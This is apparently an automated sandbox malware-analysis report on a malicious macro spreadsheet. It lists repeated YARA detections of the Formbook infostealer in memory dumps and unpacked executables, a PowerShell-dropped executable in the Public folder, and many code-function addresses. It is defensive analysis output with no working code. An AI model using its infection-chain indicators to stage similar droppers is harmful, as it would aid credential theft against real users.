            Source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Found detection on Joe Sandbox Cloud Basic with higher score
            Source: purchase Order.xlsm | Joe Sandbox Cloud Basic: Detection: malicious Score: 64
            Powershell drops PE file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\eVJOpc.exe
            Source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: Process Memory Space: powershell.exe PID: 6124, type: MEMORYSTR | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
            Source: C:\Users\Public\eVJOpc.exe | Code function: 8_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_0493E758
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_0493C828
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_0493C848
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_07943510
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_07940040
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_07947988
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_07940006
            Source: C:\Users\Public\eVJOpc.exe | Code function: 8_2_004047D3
            Source: C:\Users\Public\eVJOpc.exe | Code function: 8_2_004061D4
            Source: C:\Users\Public\eVJOpc.exe | Code function: 8_2_10007AC0
            Source: C:\Users\Public\eVJOpc.exe | Code function: 8_2_1000BA02
            Source: C:\Users\Public\eVJOpc.exe | Code function: 8_2_1000BA11
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00401030
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_0041B8B3
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_0041C10F
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_0041C19E
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_0041C2BC
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_0041C4E6
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00408C90
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00408C95
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00402D88
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00402D90
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_0041CFFA
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00402FB0
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00B720A0
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00B5B090
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00C128EC
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00C120A8
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00C01002
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00C1E824
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00B64120
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00B4F900
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00C122AE
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00BFFA2B
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00B7EBB0
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00C0DBD2
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00C003DA
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00C12B28
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00C0D466
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00B5841F
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00C125DD
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00B72581
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00B5D5E0
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00B40D20
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00C11D55
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00C12D07
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00C12EF7
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00B66E30
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00C0D616
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00C1DFCE
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00C11FF1
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_1_00401030
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_1_0041B8B3
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_1_0041C10F
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_1_0041C19E
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_1_0041C2BC
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_1_0041C4E6
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_1_00408C90
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_1_00408C95
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_1_00402D88
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_1_00402D90
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_1_0041CFFA
            Source: C:\Users\Public\eVJOpc.exe | Code function: 9_1_00402FB0
            Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_033A2B28
            Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_0339231B
            Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_032FA309
            Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_032FAB40
            Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_0337CB4F
            Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_0330EBB0
            Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_032FEB9A
            Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_0330138B
            Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_0337EB8A
            Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_03328BE8
            Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_033823E3
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033903DA
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0330ABD8
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339DBD2
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0338FA2B
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FB236
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03395A4F
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A32A9
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A22AE
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03394AEF
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339E2C5
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F4120
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032DF900
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F99BF
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033AE824
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA830
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D6800
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03391002
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033020A0
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A20A8
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032EB090
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033960F5
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A28EC
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A1FF1
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033967E2
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033ADFCE
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F6E30
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339D616
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F5600
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03381EB6
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A2EF7
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033006C0
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D0D20
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A2D07
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A1D55
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033065A0
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03302581
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03392D82
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032ED5E0
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A25DD
